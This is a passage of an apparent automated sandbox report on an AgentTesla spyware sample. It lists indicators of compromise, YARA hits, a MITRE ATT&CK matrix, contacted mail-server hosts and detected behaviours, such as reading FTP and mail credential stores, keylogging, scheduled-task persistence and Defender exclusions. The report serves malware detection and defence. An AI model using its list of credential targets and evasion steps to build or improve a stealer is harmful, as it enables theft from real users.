                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeFile opened: C:\FTP Navigator\Ftplist.txt
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\jKqPSehspS.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\AppData\Roaming\BLpvFR.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: Yara matchFile source: 0.2.jKqPSehspS.exe.4259970.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.jKqPSehspS.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.jKqPSehspS.exe.4294390.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.jKqPSehspS.exe.4294390.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.jKqPSehspS.exe.4259970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3946068127.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3946194292.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1536631690.0000000004259000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: jKqPSehspS.exe PID: 1308, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jKqPSehspS.exe PID: 6784, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BLpvFR.exe PID: 7408, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected AgentTesla
                    Source: Yara matchFile source: 0.2.jKqPSehspS.exe.4259970.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.jKqPSehspS.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.jKqPSehspS.exe.4294390.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.jKqPSehspS.exe.4294390.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.jKqPSehspS.exe.4259970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000E.00000002.3946194292.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3946068127.0000000002F21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3946068127.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.3946194292.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1536631690.0000000004259000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: jKqPSehspS.exe PID: 1308, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: jKqPSehspS.exe PID: 6784, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: BLpvFR.exe PID: 7408, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                    Windows Management Instrumentation                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		11
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		1
                    File and Directory Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Scheduled Task/Job                    		111
                    Process Injection                    		2
                    Obfuscated Files or Information                    		11
                    Input Capture                    		24
                    System Information Discovery                    		Remote Desktop Protocol2
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    Scheduled Task/Job                    		2
                    Software Packing                    		1
                    Credentials in Registry                    		1
                    Query Registry                    		SMB/Windows Admin Shares1
                    Email Collection                    		2
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                    DLL Side-Loading                    		NTDS211
                    Security Software Discovery                    		Distributed Component Object Model11
                    Input Capture                    		23
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Masquerading                    		LSA Secrets1
                    Process Discovery                    		SSH1
                    Clipboard Data                    		Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts141
                    Virtualization/Sandbox Evasion                    		Cached Domain Credentials141
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
                    Process Injection                    		DCSync1
                    Application Window Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    System Network Configuration Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588702 Sample: jKqPSehspS.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 46 mail.iaa-airferight.com 2->46 48 api.ipify.org 2->48 50 206.23.85.13.in-addr.arpa 2->50 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Sigma detected: Scheduled temp file as task from temp location 2->60 62 7 other signatures 2->62 8 jKqPSehspS.exe 7 2->8         started        12 BLpvFR.exe 5 2->12         started        signatures3 process4 file5 38 C:\Users\user\AppData\Roaming\BLpvFR.exe, PE32 8->38 dropped 40 C:\Users\user\...\BLpvFR.exe:Zone.Identifier, ASCII 8->40 dropped 42 C:\Users\user\AppData\Local\Temp\tmp89B.tmp, XML 8->42 dropped 44 C:\Users\user\AppData\...\jKqPSehspS.exe.log, ASCII 8->44 dropped 64 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->64 66 Uses schtasks.exe or at.exe to add and modify task schedules 8->66 68 Adds a directory exclusion to Windows Defender 8->68 14 jKqPSehspS.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        70 Multi AV Scanner detection for dropped file 12->70 72 Machine Learning detection for dropped file 12->72 74 Injects a PE file into a foreign processes 12->74 24 BLpvFR.exe 12->24         started        26 schtasks.exe 12->26         started        signatures6 process7 dnsIp8 52 api.ipify.org 104.26.12.205, 443, 49707, 49711 CLOUDFLARENETUS United States 14->52 54 mail.iaa-airferight.com 46.175.148.58, 25 ASLAGIDKOM-NETUA Ukraine 14->54 76 Installs a global keyboard hook 14->76 78 Loading BitLocker PowerShell Module 18->78 28 conhost.exe 18->28         started        30 WmiPrvSE.exe 18->30         started        32 conhost.exe 20->32         started        34 conhost.exe 22->34         started        80 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 24->80 82 Tries to steal Mail credentials (via file / registry access) 24->82 84 Tries to harvest and steal ftp login credentials 24->84 86 Tries to harvest and steal browser information (history, passwords, etc) 24->86 36 conhost.exe 26->36         started        signatures9 process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    jKqPSehspS.exe79%VirustotalBrowse
                    jKqPSehspS.exe91%ReversingLabsWin32.Trojan.AgentTesla
                    jKqPSehspS.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\BLpvFR.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\BLpvFR.exe91%ReversingLabsWin32.Trojan.AgentTesla

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    No Antivirus matches

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    mail.iaa-airferight.com
                    		46.175.148.58
                    		truefalse
                      		high
                      api.ipify.org
                      		104.26.12.205
                      		truefalse
                        		high
                        206.23.85.13.in-addr.arpa
                        		unknown
                        		unknownfalse
                          		high

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          https://api.ipify.org/false
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://api.ipify.orgjKqPSehspS.exe, 00000000.00000002.1536631690.0000000004259000.00000004.00000800.00020000.00000000.sdmp, jKqPSehspS.exe, 00000009.00000002.3946068127.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, jKqPSehspS.exe, 00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmp, BLpvFR.exe, 0000000E.00000002.3946194292.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://localhost/arkanoid_server/requests.phpjKqPSehspS.exe, BLpvFR.exe.0.drfalse
                                		high
                                https://account.dyn.com/jKqPSehspS.exe, 00000000.00000002.1536631690.0000000004259000.00000004.00000800.00020000.00000000.sdmp, jKqPSehspS.exe, 00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmpfalse
                                  		high
                                  https://api.ipify.org/tjKqPSehspS.exe, 00000009.00000002.3946068127.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, BLpvFR.exe, 0000000E.00000002.3946194292.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namejKqPSehspS.exe, 00000000.00000002.1534303990.0000000003286000.00000004.00000800.00020000.00000000.sdmp, jKqPSehspS.exe, 00000009.00000002.3946068127.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, BLpvFR.exe, 0000000A.00000002.1573785874.0000000002756000.00000004.00000800.00020000.00000000.sdmp, BLpvFR.exe, 0000000E.00000002.3946194292.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://mail.iaa-airferight.comjKqPSehspS.exe, 00000009.00000002.3946068127.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp, BLpvFR.exe, 0000000E.00000002.3946194292.0000000002E2C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        104.26.12.205
                                        		api.ipify.orgUnited States
                                        		13335CLOUDFLARENETUSfalse
                                        46.175.148.58
                                        		mail.iaa-airferight.comUkraine
                                        		56394ASLAGIDKOM-NETUAfalse

                                        General Information

                                        Joe Sandbox version:42.0.0 Malachite
                                        Analysis ID:1588702
                                        Start date and time:2025-01-11 04:24:19 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 9m 27s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:19
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:jKqPSehspS.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:23a0eed35d69811a38633d41868a1fd6a20faf3912bde628eb556124fd6e5447.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@19/15@3/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 159
                                        • Number of non-executed functions: 7
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 2.23.242.162, 20.109.210.53, 13.85.23.206, 13.107.246.45
                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtCreateKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        04:25:25Task SchedulerRun new task: BLpvFR path: C:\Users\user\AppData\Roaming\BLpvFR.exe
                                        22:25:21API Interceptor8170657x Sleep call for process: jKqPSehspS.exe modified
                                        22:25:23API Interceptor49x Sleep call for process: powershell.exe modified
                                        22:25:28API Interceptor5554198x Sleep call for process: BLpvFR.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        104.26.12.205Yoranis Setup.exeGet hashmaliciousUnknownBrowse
                                        • api.ipify.org/
                                        RtU8kXPnKr.exeGet hashmaliciousQuasarBrowse
                                        • api.ipify.org/
                                        jgbC220X2U.exeGet hashmaliciousUnknownBrowse
                                        • api.ipify.org/?format=text
                                        xKvkNk9SXR.exeGet hashmaliciousTrojanRansomBrowse
                                        • api.ipify.org/
                                        GD8c7ARn8q.exeGet hashmaliciousTrojanRansomBrowse
                                        • api.ipify.org/
                                        8AbMCL2dxM.exeGet hashmaliciousRCRU64, TrojanRansomBrowse
                                        • api.ipify.org/
                                        Simple2.exeGet hashmaliciousUnknownBrowse
                                        • api.ipify.org/
                                        Ransomware Mallox.exeGet hashmaliciousTargeted RansomwareBrowse
                                        • api.ipify.org/
                                        Yc9hcFC1ux.exeGet hashmaliciousUnknownBrowse
                                        • api.ipify.org/
                                        6706e721f2c06.exeGet hashmaliciousRemcosBrowse
                                        • api.ipify.org/
                                        46.175.148.58A6AHI7Uk18.exeGet hashmaliciousAgentTeslaBrowse
                                          MyzWeEOlqb.exeGet hashmaliciousAgentTeslaBrowse
                                            5hD3Yjf7xD.exeGet hashmaliciousAgentTeslaBrowse
                                              xJZHVgxQul.exeGet hashmaliciousAgentTeslaBrowse
                                                jG8N6WDJOx.exeGet hashmaliciousAgentTeslaBrowse
                                                  HGhGAjCVw5.exeGet hashmaliciousAgentTeslaBrowse
                                                    0PPJsQE4wD.exeGet hashmaliciousAgentTeslaBrowse
                                                      kzy8qg5lbR.exeGet hashmaliciousAgentTeslaBrowse
                                                        OP53532 Harumi new order.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                          INV01542 , INV01562-7500003124 JTR-0084.exeGet hashmaliciousAgentTeslaBrowse

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            mail.iaa-airferight.comMyzWeEOlqb.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            5hD3Yjf7xD.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            xJZHVgxQul.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            jG8N6WDJOx.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            HGhGAjCVw5.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            0PPJsQE4wD.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            kzy8qg5lbR.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            OP53532 Harumi new order.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            INV01542 , INV01562-7500003124 JTR-0084.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            Shipment Dec Orders valves 2024.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            api.ipify.orgWru9ycO2MJ.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.13.205
                                                            iNFGd6bDZX.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            MyzWeEOlqb.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            5hD3Yjf7xD.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 172.67.74.152
                                                            ukBQ4ch2nE.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.13.205
                                                            ru52XOQ1p7.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 172.67.74.152
                                                            xJZHVgxQul.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            jG8N6WDJOx.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.13.205
                                                            HGhGAjCVw5.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.13.205
                                                            https://glfbanks.com/Get hashmaliciousHTMLPhisherBrowse
                                                            • 104.26.12.205

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            CLOUDFLARENETUSBalphRTkPS.exeGet hashmaliciousFormBookBrowse
                                                            • 104.21.32.1
                                                            A6AHI7Uk18.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 172.67.74.152
                                                            Wru9ycO2MJ.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.13.205
                                                            iNFGd6bDZX.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            n2pGr8w21V.exeGet hashmaliciousFormBookBrowse
                                                            • 104.18.73.116
                                                            tNXl4XhgmV.exeGet hashmaliciousMassLogger RATBrowse
                                                            • 104.21.48.1
                                                            MyzWeEOlqb.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            02Eh1ah35H.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                            • 172.67.167.146
                                                            5hD3Yjf7xD.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 172.67.74.152
                                                            MBOaS3GRtF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • 104.21.64.1
                                                            ASLAGIDKOM-NETUAA6AHI7Uk18.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            MyzWeEOlqb.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            5hD3Yjf7xD.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            xJZHVgxQul.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            jG8N6WDJOx.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            HGhGAjCVw5.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            0PPJsQE4wD.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            kzy8qg5lbR.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            OP53532 Harumi new order.scr.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58
                                                            INV01542 , INV01562-7500003124 JTR-0084.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 46.175.148.58

                                                            JA3 Fingerprints

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            3b5074b1b5d032e5620f69f9f700ff0eA6AHI7Uk18.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            Wru9ycO2MJ.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            iNFGd6bDZX.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            MyzWeEOlqb.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            5hD3Yjf7xD.exeGet hashmaliciousAgentTeslaBrowse
                                                            • 104.26.12.205
                                                            AJ5zYYsisA.exeGet hashmaliciousUnknownBrowse
                                                            • 104.26.12.205
                                                            AJ5zYYsisA.exeGet hashmaliciousUnknownBrowse
                                                            • 104.26.12.205
                                                            4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                            • 104.26.12.205
                                                            n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                            • 104.26.12.205
                                                            njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                            • 104.26.12.205

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BLpvFR.exe.log

                                                            Download File
                                                            Process:C:\Users\user\AppData\Roaming\BLpvFR.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jKqPSehspS.exe.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\jKqPSehspS.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:true
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):2232
                                                            Entropy (8bit):5.380285623575084
                                                            Encrypted:false
                                                            SSDEEP:48:+WSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMugeoM0Uyus:+LHxvCZfIfSKRHmOugU1s
                                                            MD5:D9CF7738F833416DF98067988B7270F6
                                                            SHA1:850DD37FC5CA1D2EDA84ABE415D61F9AF8E7A500
                                                            SHA-256:952C0E59BC9FA7C1BB0515AEC11D3E3A70A6180C8A217A546C15605D9ADED106
                                                            SHA-512:885CFEB3C9146D884229B106B82ED4B85491A9C0289B2C4CF23A051B492F2F75ECA9769078A823B3C7229E45ED0A25693B06E2675FC29BB558BC115201637D14
                                                            Malicious:false
                                                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0sc24soe.lpd.ps1

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
